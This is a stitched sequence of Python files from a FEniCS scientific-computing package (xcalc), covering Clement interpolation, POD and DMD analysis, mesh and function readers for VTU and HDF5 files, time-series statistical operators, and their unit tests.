            f.t = t
            v = interpolate(f, V)
            ft_pairs.append((v, t))

        series = TempSeries(ft_pairs)
        std = Eval(STD(series))  # Efficiently in PETSc
        # From definition
        std_ = Eval(sqrt(Mean(series**2) - Mean(series)**2))
        self.assertTrue(error(std_, std) < 1E-14)

    def test_sliding_window(self):
        mesh = UnitSquareMesh(4, 4)
        V = FunctionSpace(mesh, 'CG', 1)
        series = TempSeries([(interpolate(Constant(1), V), 0),
                             (interpolate(Constant(2), V), 1),
                             (interpolate(Constant(3), V), 2),
                             (interpolate(Constant(4), V), 3)])
        # Window of 2 over squared values: means of (1,4), (4,9), (9,16)
        f_series = Eval(SlidingWindowFilter(Mean, 2, series**2))
        assert len(f_series) == 3
        assert f_series.times == (1, 2, 3)

        self.assertTrue(error(Constant(2.5), f_series.getitem(0)) < 1E-14)
        self.assertTrue(error(Constant(6.5), f_series.getitem(1)) < 1E-14)
        self.assertTrue(error(Constant(12.5), f_series.getitem(2)) < 1E-14)

    def test_minimum(self):
        A = np.array([[1, -2], [-3, 1]])

        mesh = UnitSquareMesh(10, 10)
        V = TensorFunctionSpace(mesh, 'DG', 0)
        f = interpolate(Constant(A), V)

        me = Eval(Minimum(Eigw(f+f)))  # Eval o Declared
        true = Constant(np.min(np.linalg.eigvals(A+A)))
        self.assertTrue(error(true, me) < 1E-14)

    def test_maximum(self):
        A = np.array([[1, -2], [-3, 1]])

        mesh = UnitSquareMesh(10, 10)
        V = TensorFunctionSpace(mesh, 'DG', 0)
        f = interpolate(Constant(A), V)

        me = Eval(Maximum(Eigw(f-3*f)))  # Eval o Declared
        true = Constant(np.max(np.linalg.eigvals(A-3*A)))
        self.assertTrue(error(true, me) < 1E-14)

    def test_maximum_fail(self):
        mesh = UnitSquareMesh(10, 10)
        # RT elements have no pointwise max semantics here
        V = FunctionSpace(mesh, 'RT', 1)

        with self.assertRaises(AssertionError):
            Eval(Maximum(Function(V)))  # Don't know how to collapse this
|
MiroK/fenics-cacl | xcalc/clement.py | <gh_stars>1-10
from dolfin import *
from mpi4py import MPI as piMPI
import ufl
def clement_interpolate(expr):
    '''
    Here, the Clement interpolant is a CG_1 function over
    mesh constructed in two steps (See Braess' Finite element book):
    1) For each mesh vertex xj let wj the union of cells that share the vertex
       (i.e wj is the support of vj - the basis function of CG_1 function
       space such that vj(xj) = 1). Then Qj(expr) is an L2 projection of
       expr into constant field on wj.
    2) Set Ih(expr) = sum_j Qj(expr)vj.

    Returns a CG1 Function (scalar, vector or square-tensor valued,
    matching expr's shape). Requires the PETSc linear algebra backend.
    '''
    # Analyze expr and raise if invalid
    terminals = _analyze_expr(expr)
    # Analyze shape and raise if expr cannot be represented
    _analyze_shape(expr.ufl_shape)
    shape = expr.ufl_shape
    # Extract mesh from expr operands and raise if it is not unique or missing
    mesh = _extract_mesh(terminals)

    # Compute things for constructing Q
    Q = FunctionSpace(mesh, 'DG', 0)
    q = TestFunction(Q)
    # Forms for L2 means [rhs]
    # Scalar, Vectors, Tensors are built from components
    # Translate expression into forms for individual components
    if len(shape) == 0:
        forms = [inner(expr, q)*dx]
    elif len(shape) == 1:
        forms = [inner(expr[i], q)*dx for i in range(shape[0])]
    else:
        forms = [inner(expr[i, j], q)*dx for i in range(shape[0]) for j in range(shape[1])]

    # Build averaging or summation operator for computing the interpolant
    # from L2 averaged components.
    V = FunctionSpace(mesh, 'CG', 1)
    volumes = assemble(inner(Constant(1), q)*dx)
    # Ideally we compute the averaging operator, then the interpolant is
    # simply A*component. I have not implemented this for backends other
    # than PETSc.
    is_petsc = parameters['linear_algebra_backend'] == 'PETSc'
    assert is_petsc
    A = _construct_averaging_operator(V, volumes)

    # L2 means of comps to indiv. cells
    means = map(assemble, forms)
    # The interpolant (scalar, vector, tensor) is built from components
    components = []
    for mean in means:
        # Scalar: A maps the DG0 cell means to CG1 vertex values
        component = Function(V)
        A.mult(mean, component.vector())
        components.append(component)

    # Finalize the interpolant
    # Scalar has same space as component
    if len(shape) == 0:
        uh = components.pop()
        uh.vector().apply('insert')
        return uh
    # Vector/tensor: assign components into the product space
    if len(shape) == 1:
        W = VectorFunctionSpace(mesh, 'CG', 1, dim=shape[0])
    else:
        W = TensorFunctionSpace(mesh, 'CG', 1, shape=shape)
    assigner = FunctionAssigner(W, [V]*len(forms))
    uh = Function(W)
    assigner.assign(uh, components)
    uh.vector().apply('insert')
    return uh
# Workers--
def _analyze_expr(expr):
    '''
    A valid expr for Clement interpolation is defined only in terms of pointwise
    operations on finite element functions. Returns the expression's unique
    terminals; raises ValueError otherwise.
    '''
    # Arguments (trial/test functions) and quantities that are not well
    # defined at a vertex cannot be Clement-interpolated.
    banned = (ufl.Argument, ufl.MaxCellEdgeLength, ufl.MaxFacetEdgeLength,
              ufl.MinCellEdgeLength, ufl.MinFacetEdgeLength,
              ufl.FacetArea, ufl.FacetNormal,
              ufl.CellNormal, ufl.CellVolume)
    # Forms are out as well
    if isinstance(expr, ufl.Form):
        raise ValueError('Expression is a form')
    terminals = list(ufl.corealg.traversal.traverse_unique_terminals(expr))
    if any(isinstance(t, banned) for t in terminals):
        raise ValueError('Invalid expression (e.g. has Arguments as operand)')
    # At this point the expression is valid
    return terminals
def _analyze_shape(shape):
'''
The shape of expr that UFL can build is arbitrary but we only support
scalar, rank-1 and rank-2(square) tensors.
'''
is_valid = len(shape) < 3 and (shape[0] == shape[1] if len(shape) == 2 else True)
if not is_valid:
raise ValueError('Interpolating Expr does not result rank-0, 1, 2 function')
def _extract_mesh(terminals):
    '''Get the common mesh of operands that make the expression.'''
    pairs = []
    for t in terminals:
        # Functions expose the mesh via their function space ...
        try:
            mesh = t.function_space().mesh()
            pairs.append((mesh.id(), mesh))
        except AttributeError:
            # ... geometric quantities via their UFL domain; other
            # terminals (numbers) carry no mesh and are skipped.
            try:
                mesh = t.ufl_domain().ufl_cargo()
                pairs.append((mesh.id(), mesh))
            except AttributeError:
                pass
    ids = set(id_ for id_, _ in pairs)
    # Unique mesh
    if len(ids) == 1: return pairs.pop()[1]
    # Mesh of Nones or multiple meshes
    raise ValueError('Failed to extract mesh: Operands with no or different meshes')
def _construct_summation_operator(V):
    '''
    Summation matrix has the following properties: It is a map from DG0 to CG1.
    It has the same sparsity pattern as the mass matrix and in each row the nonzero
    entries are 1. Finally let v \in DG0 then (A*v)_i is the sum of entries of v
    that live on the support of i-th basis function of CG1.
    '''
    mesh = V.mesh()
    Q = FunctionSpace(mesh, 'DG', 0)
    q = TrialFunction(Q)
    v = TestFunction(V)
    tdim = mesh.topology().dim()
    K = CellVolume(mesh)
    # Vertex quadrature: one point per vertex, weights K/(tdim+1)
    dX = dx(metadata={'form_compiler_parameters': {'quadrature_degree': 1,
                                                   'quadrature_scheme': 'vertex'}})
    # This is a nice trick which uses properties of the vertex quadrature to get
    # only ones as nonzero entries (the (tdim+1)/K factor cancels the weight).
    # NOTE: It is designed spec. for CG1. In particular does not work for CG2 etc, so
    # for such spaces a different construction is required, e.g. rewrite nnz
    # entries of mass matrix V, Q to 1. That said CG2 is the highest order where
    # Clement interpolation makes sense. With higher order the dofs that are
    # interior to a cell (or if there are multiple dofs per facet interior) are
    # assigned the same value.
    A = assemble((1./K)*Constant(tdim+1)*inner(v, q)*dX)
    return A
def _construct_averaging_operator(V, c):
    '''
    If b is the vectors of L^2 means of some u on the mesh, v is the vector
    of cell volumes and A is the summation oparotr then x=(Ab)/(Ac) are the
    coefficient of Clement interpolant of u in V. Here we construct an operator
    B such that x = Bb.
    '''
    # The PETSc backend is required for diagonalScale/reciprocal below
    assert parameters['linear_algebra_backend'] == 'PETSc'
    A = _construct_summation_operator(V)
    # Ac holds, per CG1 dof, the total volume of the supporting cells
    Ac = Function(V).vector()
    A.mult(c, Ac)
    # 1/Ac
    Ac = as_backend_type(Ac).vec()
    Ac.reciprocal()
    # Scale rows (in place) so that A becomes the averaging operator B
    mat = as_backend_type(A).mat()
    mat.diagonalScale(L=Ac)
    return A
|
MiroK/fenics-cacl | test/test_clement.py | <filename>test/test_clement.py
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    '''L2 distance between the exact field `true` and the computed one `me`.'''
    diff = me - true
    domain = me.function_space().mesh()
    return sqrt(abs(assemble(inner(diff, diff)*dx(domain=domain))))
class TestClement(unittest.TestCase):
    '''Sanity'''
    def test(self):
        # Convergence study: Eval of grad(x^2 + y^2) (Clement interpolation)
        # should approach the exact gradient (2x, 2y) under mesh refinement
        errors, hs = [], []
        for n in (4, 8, 16, 32):
            mesh = UnitSquareMesh(n, n)
            x, y = SpatialCoordinate(mesh)
            uh = Eval(grad(x**2 + y**2))
            u = as_vector((2*x, 2*y))
            errors.append(error(u, uh))
            hs.append(mesh.hmin())
        # The L2 error must decrease monotonically with refinement
        self.assertTrue(np.all(np.diff(errors) < 0))
        # Actual rate
        deg = np.round(np.polyfit(np.log(hs), np.log(errors), 1)[0], 0)
        self.assertTrue(deg >= 1)
|
MiroK/fenics-cacl | test/test_known_fail.py | <gh_stars>1-10
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    '''L2 norm of the difference between the exact field and the computed one.'''
    mesh = me.function_space().mesh()
    return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
    '''UnitTest for (some of) xcalc.interpreter (no timeseries)'''
    def test_maybe_fix_future(self):
        # Raviart-Thomas is not a (tensor product of a) Lagrange space, so
        # the interpreter currently refuses such operands with AssertionError
        mesh = UnitSquareMesh(10, 10)
        V = FunctionSpace(mesh, 'RT', 1)
        x = Function(V)
        y = Function(V)
        for f in (inner(x, y), as_vector((x[0], y[1])), 2*x+y):
            with self.assertRaises(AssertionError):
                Eval(f)
|
MiroK/fenics-cacl | xcalc/dmd.py | from dolfin import Function
from collections import namedtuple
import numpy as np
ComplexFunction = namedtuple('ComplexFunction', ('real', 'imag'))
def dmd(functions, dmd_object, dt=1, modal_analysis=[]):
    '''
    Dynamic mode decomposition:
    <NAME>. (2010), vol. 656, pp. 5-28 (idea)
    On dynamic mode decomposition: theory and application; Tu, J. H et al. (implement)
    DMD of (ordered, dt-equispaced) snapshots. dmd_object is the configured DMDBase instance.
    '''
    # NOTE: modal_analysis default is mutable but it is only read, never mutated
    assert all(isinstance(f, Function) for f in functions)
    # Wrap for pydmd: columns of X are the snapshot dof vectors
    X = np.array([f.vector().get_local() for f in functions]).T
    # Rely on pydmd
    dmd_object.fit(X)
    dmd_object.original_time['dt'] = dt
    V = functions[0].function_space()
    eigs = dmd_object.eigs
    modes = []
    # NOTE: unlike with pod where the basis was only real here the
    # modes might have complex components so ...
    for x in dmd_object.modes.T:
        f_real = Function(V)
        f_real.vector().set_local(x.real)
        f_imag = Function(V)
        f_imag.vector().set_local(x.imag)
        modes.append(ComplexFunction(f_real, f_imag))
    # Optionally also return the temporal dynamics of the selected modes
    if len(modal_analysis):
        return eigs, modes, dmd_object.dynamics[modal_analysis]
    return eigs, modes
# ------------------------------------------------------------------------------
if __name__ == '__main__':
    # Smoke test: DMD of snapshots generated by repeatedly applying a random
    # diagonal operator to an interpolated seed function
    from dolfin import UnitSquareMesh, Expression, FunctionSpace, interpolate, File
    from dolfin import XDMFFile, inner, grad, dx, assemble
    from interpreter import Eval
    # Build a monomial basis for x, y, x**2, xy, y**2, ...
    try:
        from pydmd import DMD
        # https://github.com/mathLab/PyDMD
    except ImportError:
        # Fall back on the bundled implementation
        from xcalc.dmdbase import DMD
    deg = 4
    mesh = UnitSquareMesh(3, 3)
    V = FunctionSpace(mesh, 'CG', 1)
    f = interpolate(Expression('x[0]+x[1]', degree=1), V).vector().get_local()
    A = np.diag(np.random.rand(V.dim()))
    basis = []
    for i in range(deg):
        for j in range(deg):
            # Snapshot sequence f, Af, A^2 f, ...
            f = A.dot(f)
            Af = Function(V); Af.vector().set_local(f)
            basis.append(Af)
    # NOTE: skipping 1 bacause Eval of it is not a Function
    dmd_ = DMD(svd_rank=-1, exact=False)
    energy, pod_basis = dmd(basis[1:], dmd_)
    # NOTE(review): Python 2 print statements; reconstruction error should be small
    print np.linalg.norm(dmd_.snapshots - dmd_.reconstructed_data.real)
    print len(pod_basis), len(basis[1:])
|
MiroK/fenics-cacl | xcalc/function_read.py | # This is the most fragile component of the package so be advised that
# these ARE NOT GENERAL PURPOSE READEDERS
from dolfin import Function, dof_to_vertex_map, warning, Mesh, MeshEditor
import xml.etree.ElementTree as ET
from itertools import dropwhile
from mpi4py import MPI
import numpy as np
try:
import h5py
except ImportError:
warning('H5Py missing')
assert MPI.COMM_WORLD.size == 1, 'No parallel (for your own good)'
def data_reordering(V):
    '''Reshaping/reordering data read from files'''
    # HDF5/VTK store 3d vectors and 3d tensor so we need to chop the data
    # also reorder as in 2017.2.0 only(?) vertex values are dumped
    if V.ufl_element().value_shape() == ():
        # Scalar: only the dof-to-vertex permutation is needed
        dof2v = dof_to_vertex_map(V)
        reorder = lambda a: a[dof2v]
        return reorder
    # Vector/tensor: the permutation of a single scalar component
    Vi = V.sub(0).collapse()
    dof2v = dof_to_vertex_map(Vi)
    gdim = V.mesh().geometry().dim()
    # WARNING: below there are assumption on component ordering
    # Vector
    if len(V.ufl_element().value_shape()) == 1:
        # Ellim Z for vectors in 2d
        keep = [0, 1] if gdim == 2 else range(gdim)
        # NOTE(review): the default arg is named dof2f but the body closes over
        # dof2v -- this works (same object) but looks like a typo
        reorder = lambda a, keep=keep, dof2f=dof2v:(
            np.column_stack([row[dof2v] for row in (a[:, keep]).T]).flatten()
        )
        return reorder
    # And tensor
    if len(V.ufl_element().value_shape()) == 2:
        # Ellim Z (for 2d keep the xx, xy, yx, yy entries of the 3x3 storage)
        keep = [0, 1, 3, 4] if gdim == 2 else range(gdim**2)
        reorder = lambda a, keep=keep, dof2f=dof2v:(
            np.column_stack([row[dof2v] for row in (a[:, keep]).T]).flatten()
        )
        return reorder
def read_vtu_function(vtus, V):
    '''Read in functions in V from VTUs files'''
    # NOTE: this would be much easier with (py)vtk but that is not part
    # of the FEniCS stack, so the XML is parsed by hand
    gdim = V.mesh().geometry().dim()
    assert gdim > 1
    # Allow a single path as well as a list of paths
    paths = [vtus] if isinstance(vtus, str) else vtus

    mesh = V.mesh()
    npoints, ncells = mesh.num_vertices(), mesh.num_cells()
    reorder = data_reordering(V)

    def load_one(path):
        # Fresh Function filled with the (reordered) vertex data of one VTU
        f = Function(V)
        f.vector().set_local(reorder(read_vtu_point_data(path, npoints, ncells)))
        return f

    return [load_one(path) for path in paths]
def read_vtu_point_data(vtu, nvertices, ncells):
    '''PointData element of ASCII VTU file'''
    tree = ET.parse(vtu)
    root = tree.getroot()
    # VTKFile -> UnstructuredGrid -> Piece
    grid = next(iter(root))
    piece = next(iter(grid))
    # Check consistency of mesh (somewhat)
    assert nvertices == int(piece.attrib['NumberOfPoints'])
    assert ncells == int(piece.attrib['NumberOfCells'])
    # Throw StopIteration
    point_data_elm = next(dropwhile(lambda x: x.tag != 'PointData', piece))
    data = next(iter(point_data_elm))
    # Missing attribute means scalar data
    ncomps = int(data.attrib.get('NumberOfComponents', 0))
    # NOTE: Python 2 map/filter; values are whitespace-separated ASCII
    values = np.array(map(float, filter(bool, data.text.split(' '))))
    # Reshape for reorder (so it is same as H5File
    if ncomps:
        values = values.reshape((-1, ncomps))
    return values
def read_h5_function(h5_file, times, V):
    '''
    Read in function in V from h5_file:/VisualisationVector/times
    '''
    gdim = V.mesh().geometry().dim()
    assert gdim > 1
    # Allow a single timestamp key as well as a list of them
    if isinstance(times, str): times = [times]
    reorder = data_reordering(V)
    functions = []
    # Read the functions
    with h5py.File(h5_file, 'r') as h5:
        group = h5.get('VisualisationVector')
        for key in times:
            f = Function(V)   # What to fill
            # NOTE(review): Dataset.value is deprecated/removed in modern
            # h5py; group[key][...] is the forward-compatible spelling
            data = group[key].value
            f.vector().set_local(reorder(data))
            functions.append(f)
    return functions
def read_h5_mesh(path, cell_type):
    '''Read in mesh from function stored in H5 file.

    The mesh geometry/topology are expected under Mesh/0/mesh, the layout
    dolfin's XDMFFile uses when saving a function.
    '''
    # Is there a better way? (via HDF5File)
    # Context manager so the file handle is not leaked (the original never
    # closed it). Indexing with [...] reads the datasets eagerly into numpy
    # arrays, so closing before make_mesh is safe; it also avoids the
    # deprecated Dataset.value accessor.
    with h5py.File(path, 'r') as h5:
        mesh_group = h5['Mesh']['0']['mesh']
        vertices = mesh_group['geometry'][...]
        cells = mesh_group['topology'][...]
    return make_mesh(vertices, cells, cell_type)
def read_vtu_mesh(path, cell_type):
    '''Read in mesh from function stored in vtu file'''
    tree = ET.parse(path)
    root = tree.getroot()
    # VTKFile -> UnstructuredGrid -> Piece -> (Points, Cells, data)
    grid = next(iter(root))
    piece = next(iter(grid))
    points, cells, _ = list(piece)
    # Parse points
    point_data = next(iter(points))
    # Always 3d gdim with this file format
    gdim = cell_type.geometric_dimension()
    # NOTE: Python 2 map/filter; chop trailing coordinates down to gdim
    point_data = np.array(map(float, filter(bool, point_data.text.split(' '))))
    point_data = point_data.reshape((-1, 3))[:, :gdim]
    # Parse cells
    cell_data = next(iter(cells))
    cell_data = np.array(map(int, filter(bool, cell_data.text.split(' '))))
    cell_data = cell_data.reshape((-1, cell_type.num_vertices()))
    return make_mesh(point_data, cell_data, cell_type)
def make_mesh(vertices, cells, cell_type):
    '''Mesh from data by MeshEditor'''
    gdim = cell_type.geometric_dimension()
    assert vertices.shape[1] == gdim
    tdim = cell_type.topological_dimension()
    mesh = Mesh()
    editor = MeshEditor()
    editor.open(mesh, str(cell_type), tdim, gdim)
    # Sizes must be declared before any vertex/cell is added
    editor.init_vertices(len(vertices))
    editor.init_cells(len(cells))
    for vi, x in enumerate(vertices): editor.add_vertex(vi, x)
    for ci, c in enumerate(cells): editor.add_cell(ci, *c)
    # Finalizes mesh connectivity
    editor.close()
    return mesh
|
MiroK/fenics-cacl | apps/series_pod_analysis.py | from xcalc.function_read import read_vtu_mesh
from xcalc.timeseries import PVDTempSeries
from xcalc.interpreter import Eval
from xcalc.operators import Mean, RMS
from xcalc.pod import pod
from dolfin import *
import numpy as np
# POD analysis of a combined pressure/velocity quantity read from PVD series.
# NOTE(review): `dir` shadows the builtin of the same name; kept as the
# script refers to it throughout
dir = '/mn/sarpanitu/eksterne-u1/mirok/Documents/Programming/DragANN/data/ActiveControl'
# Since we want to combine the two series loading the mesh automatically would
# give different mesh IDs - xcalc is strict about this assumption so declare the
# mesh/space ourselves
cell = triangle
mesh = read_vtu_mesh('%s/p_out000000.vtu' % dir, cell)
# Load series
Q = FunctionSpace(mesh, FiniteElement('Lagrange', cell, 1))
p = PVDTempSeries('%s/p_out.pvd' % dir, Q)
V = FunctionSpace(mesh, VectorElement('Lagrange', cell, 1))
v = PVDTempSeries('%s/u_out.pvd' % dir, V)
# Chop to region of interest
temp_slice = slice(200, 401, None)
p = p.getitem(temp_slice)
v = v.getitem(temp_slice)
# Some funny series that we want to look at
function_series = Eval(sqrt(p**2 + inner(v, v)/2))
# NOTE: nodes are the actual functions in the series
functions = function_series.nodes
# Run pod analysis on it
nmodes = 6
energy, pod_basis, C = pod(functions, modal_analysis=range(nmodes))
# Dump the leading POD modes for paraview inspection
out = File('%s/pod_%s.pvd' % (dir, dir.lower()))
for index, f in enumerate(pod_basis[slice(0, nmodes)]):
    f.rename('f', '0')
    out << (f, float(index))
# Dump the energy
np.savetxt('%s/pod_%s_energy.txt' % (dir, dir.lower()), energy)
# Headless plotting (Agg backend, no display needed)
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
plt.figure()
plt.semilogy(energy, color='blue', marker='o', linestyle=':')
plt.savefig('%s/pod_%s_energy.png' % (dir, dir.lower()))
# Temporal evolution of the modal coefficients
times = function_series.times
plt.figure()
for i, coef_i in enumerate(C):
    plt.plot(times, coef_i, label=str(i))
plt.legend(loc='best')
plt.savefig('%s/pod_%s_modes.png' % (dir, dir.lower()))
plt.show()
|
MiroK/fenics-cacl | xcalc/pod.py | <reponame>MiroK/fenics-cacl
from dolfin import Function
from types import FunctionType
import numpy as np
def pod(functions, ip=lambda u, v: u.vector().inner(v.vector()), modal_analysis=[]):
    '''
    Proper orthogonal decomposition
    Let there be a collection of Functions and an inner product. POD constructs
    basis of the space spanned by functions according to the eigendecomposition
    of the inner product matrix. Let that basis be {phi_i}. Each fj of functions
    can be decomposed in the basis as fj = c^{j}_i phi_i. If j is associated with
    time then c^{all j}_i give a temporal evolution of the coef for mode i.
    With `modal_analysis` a matrix C is returned which corresponds to
    coef of i-th modes.
    '''
    # NOTE: modal_analysis default is mutable but it is only read, never mutated
    # Sanity of inputs
    assert all(isinstance(f, Function) for f in functions)
    assert isinstance(ip, FunctionType) and nargs(ip) == 2
    # Build the (symmetric) matrix of the inner products
    n = len(functions)
    A = np.zeros((n, n))
    for i, fi in enumerate(functions):
        A[i, i] = ip(fi, fi)
        # Only the upper triangle is computed; symmetry fills the rest
        for j, fj in enumerate(functions[i+1:], i+1):
            value = ip(fi, fj)
            A[i, j] = A[j, i] = value
    eigw, eigv = np.linalg.eigh(A)
    # NOTE: the matrix should normally be pos def but round of ...
    eigw = np.abs(eigw)
    # Make eigv have rows as vectors
    eigv = eigv.T
    # Reverse so that largest modes come first (eigh sorts ascending)
    eigw = eigw[::-1]
    eigv = eigv[::-1]
    # New basis function are linear combinations with weights given by eigv[i]
    pod_basis = [linear_combination(c, functions, np.sqrt(a)) for c, a in zip(eigv, eigw)]
    if not modal_analysis:
        return eigw, pod_basis
    # Row i holds the temporal coefficients of mode modal_analysis[i]
    C = np.array([[ip(pod_basis[i], fj) for fj in functions] for i in modal_analysis])
    return eigw, pod_basis, C
def linear_combination(coefs, foos, scale=1):
    '''Construct a new function as a linear combinations (1./scale)*sum_i coefs[i]*foos[i]'''
    assert all(isinstance(f, Function) for f in foos)
    assert len(coefs) == len(foos) and len(foos)
    # Accumulate directly in the linear-algebra layer (no Eval) for speed;
    # a freshly constructed Function starts out as zero
    result = Function(foos[0].function_space())
    acc = result.vector()
    for weight, f in zip(coefs, foos):
        acc.axpy(weight, f.vector())
    acc /= scale
    return result
def normalize(f, ip):
    '''Normalize f in place so that ip(f, f) = 1; returns f for chaining.'''
    # BUGFIX: the original used bare `sqrt`, which is not imported in this
    # module and raised NameError when called; use exponentiation instead
    f.vector()[:] *= 1./(ip(f, f)**0.5)
    return f
def nargs(f):
    '''Number of (positional) arguments in the signature of f.'''
    code_object = f.__code__
    return code_object.co_argcount
# ------------------------------------------------------------------------------
if __name__ == '__main__':
    # Smoke test: POD of a monomial basis and a check of orthogonality
    from dolfin import UnitSquareMesh, Expression, FunctionSpace, interpolate, File
    from dolfin import XDMFFile, inner, grad, dx, assemble
    from interpreter import Eval
    # Build a monomial basis for x, y, x**2, xy, y**2, ...
    deg = 4
    mesh = UnitSquareMesh(3, 3)
    V = FunctionSpace(mesh, 'CG', 3)
    x = interpolate(Expression('x[0]', degree=1), V)
    y = interpolate(Expression('x[1]', degree=1), V)
    basis = []
    for i in range(deg):
        for j in range(deg):
            basis.append(Eval((x**i)*(y**j)))
    # Candidate inner products for the decomposition (l2, L2, H1)
    ip = lambda u, v: u.vector().inner(v.vector())
    #ip = lambda u, v: assemble(inner(u, v)*dx)
    #ip = lambda u, v: assemble(inner(u, v)*dx + inner(grad(u), grad(v))*dx)
    # NOTE: skipping 1 bacause Eval of it is not a Function
    energy, pod_basis = pod(basis[1:], ip=ip)
    out = File('pod_test.pvd')
    for i, f in enumerate(pod_basis):
        f.rename('f', '0')
        out << (f, float(i))
    with XDMFFile(mesh.mpi_comm(), 'pod_test.xdmf') as out:
        for i, f in enumerate(pod_basis):
            f.rename('f', '0')
            out.write(f, float(i))
    # The POD basis should be orthogonal w.r.t. the chosen inner product
    # NOTE(review): Python 2 print statements
    for fi in pod_basis:
        for fj in pod_basis:
            print ip(fi, fj)
        print
|
MiroK/fenics-cacl | xcalc/operators.py | <reponame>MiroK/fenics-cacl<gh_stars>1-10
# Some pseudo nodes (function constructors) that could be useful
from dolfin import Constant, interpolate, Function, as_backend_type
from collections import deque
from utils import numpy_op_foo, common_sub_element, make_space
from ufl.corealg.traversal import traverse_unique_terminals
import timeseries
import interpreter
import numpy as np
class LazyNode(Function):
    '''
    Base class of lazily evaluated nodes: a Function in the right space
    whose coefficients are only filled in once `evaluate` is called.
    '''
    def __init__(self, V):
        Function.__init__(self, V)

    def evaluate(self):
        # BUGFIX: the original returned the undefined name `Abstract`,
        # a NameError in disguise; subclasses must override this
        raise NotImplementedError

    @staticmethod
    def space_for(expr, shape=None):
        '''Function space where expr should be represented'''
        # Don't want to call eval here as it beats the goal of being lazy
        foos = filter(lambda f: isinstance(f, Function), traverse_unique_terminals(expr))
        # All operand functions must share one mesh (unpacking asserts it)
        _, = set(f.function_space().mesh().id() for f in foos)

        elm = common_sub_element([f.function_space() for f in foos])
        shape = expr.ufl_shape if shape is None else shape
        mesh = foos[0].function_space().mesh()

        return make_space(elm, shape, mesh)
class ConstantFunction(LazyNode):
    '''Lazy node which, when evaluated, interpolates a constant value into V.'''
    def __init__(self, V, value):
        # Kept as a dolfin Constant until evaluation time
        self.value = Constant(value)
        # Don't allow declaring bullshit
        assert V.ufl_element().value_shape() == self.value.ufl_shape
        LazyNode.__init__(self, V)
    def evaluate(self):
        self.interpolate(self.value)
        return self
def Zero(V):
    '''Zero function over V'''
    # BUGFIX: pass the raw array; ConstantFunction wraps its value in a
    # Constant itself and Constant(Constant(...)) is not a valid call
    return ConstantFunction(V, np.zeros(V.ufl_element().value_shape()))
class Eigw(LazyNode):
    '''
    For a matrix-valued expression we make a vector-valued expression of eigenvalues
    '''
    def __init__(self, expr):
        n, m = expr.ufl_shape
        assert n == m, 'Square matrices only (or implement SVD)'
        # Eigenvalues of an n x n matrix form an n-vector
        self.shape = (n, )
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
    def evaluate(self):
        # Evaluate the matrix expression, then apply numpy's eigenvalue
        # solver pointwise at each dof
        f = interpreter.Eval(self.expr)
        self.interpolate(numpy_op_foo(args=(f, ), op=np.linalg.eigvals, shape_res=self.shape))
        return self
class Eigv(LazyNode):
    '''
    For a matrix-valued expression we make a matrix-valued expression where the rows
    have the eigenvector
    '''
    def __init__(self, expr):
        n, m = expr.ufl_shape
        assert n == m, 'Square matrices only (or implement SVD)'
        self.shape = (n, m)
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
    def evaluate(self):
        f = interpreter.Eval(self.expr)
        # np.linalg.eig returns eigenvectors as columns; transpose so
        # that each row of the result holds one eigenvector
        self.interpolate(numpy_op_foo(args=(f, ),
                                      op=lambda A: np.linalg.eig(A)[1].T,
                                      shape_res=self.shape))
        return self
class Minimum(LazyNode):
    '''Minimum value in a tensor of rank > 0'''
    def __init__(self, expr):
        assert len(expr.ufl_shape) > 0
        # Pointwise min over components yields a scalar field
        self.shape = ()
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
    def evaluate(self):
        f = interpreter.Eval(self.expr)
        self.interpolate(numpy_op_foo(args=(f, ), op=np.min, shape_res=self.shape))
        return self
class Maximum(LazyNode):
    '''Maximum value in a tensor of rank > 0'''
    def __init__(self, expr):
        assert len(expr.ufl_shape) > 0
        # Pointwise max over components yields a scalar field
        self.shape = ()
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr, self.shape))
    def evaluate(self):
        f = interpreter.Eval(self.expr)
        self.interpolate(numpy_op_foo(args=(f, ), op=np.max, shape_res=self.shape))
        return self
class Mean(LazyNode):
    '''A mean of the series is 1/(T - t0)\int_{t0}^{t1}f(t)dt'''
    def __init__(self, expr):
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr))
    def evaluate(self):
        # Integrate in time by the composite trapezoidal rule: each
        # interval contributes (f0 + f1)*dt/2
        series = interpreter.Eval(self.expr)  # Functions
        mean = self
        x = mean.vector()
        x.zero()
        # NOTE: for efficiency we stay away from Interpreter
        # Int
        dts = np.diff(series.times)
        for dt, (f0, f1) in zip(dts, zip(series.nodes[:-1], series.nodes[1:])):
            x.axpy(dt/2., f0.vector())  # (f0+f1)*dt/2
            x.axpy(dt/2., f1.vector())
        # Time interval scaling
        x /= dts.sum()
        return self
class RMS(LazyNode):
    '''sqrt(1/(T - t0)\int_{t0}^{t1}f^2(t)dt'''
    def __init__(self, expr):
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr))
    def evaluate(self):
        # Time integration of f^2 by the composite trapezoidal rule
        series = interpreter.Eval(self.expr)
        rms = self
        # NOTE: for efficiency we stay away from Interpreter and all is in PETSc layer
        x = as_backend_type(rms.vector()).vec()  # PETSc.Vec
        x.zeroEntries()
        y = x.copy()  # Stores fi**2
        # Integrate
        dts = np.diff(series.times)
        f_vectors = [as_backend_type(f.vector()).vec() for f in series.nodes]
        for dt, (f0, f1) in zip(dts, zip(f_vectors[:-1], f_vectors[1:])):
            y.pointwiseMult(f0, f0)  # y = f0**2
            x.axpy(dt/2., y)  # (f0**2+f1**2)*dt/2
            y.pointwiseMult(f1, f1)  # y = f1**2
            x.axpy(dt/2., y)
        # Time interval scaling
        x /= dts.sum()
        # sqrt
        x.sqrtabs()
        return self
class STD(LazyNode):
    '''STD of series.'''
    def __init__(self, expr):
        self.expr = expr
        LazyNode.__init__(self, LazyNode.space_for(expr))
    def evaluate(self):
        # Pointwise Var(f) = <f^2> - <f>^2 with trapezoid-in-time means
        # first, compute the mean
        series = interpreter.Eval(self.expr)
        mean = interpreter.Eval(Mean(series))
        # get the square of the field of the mean
        mean_vector = mean.vector()
        mvs = as_backend_type(mean_vector).vec()
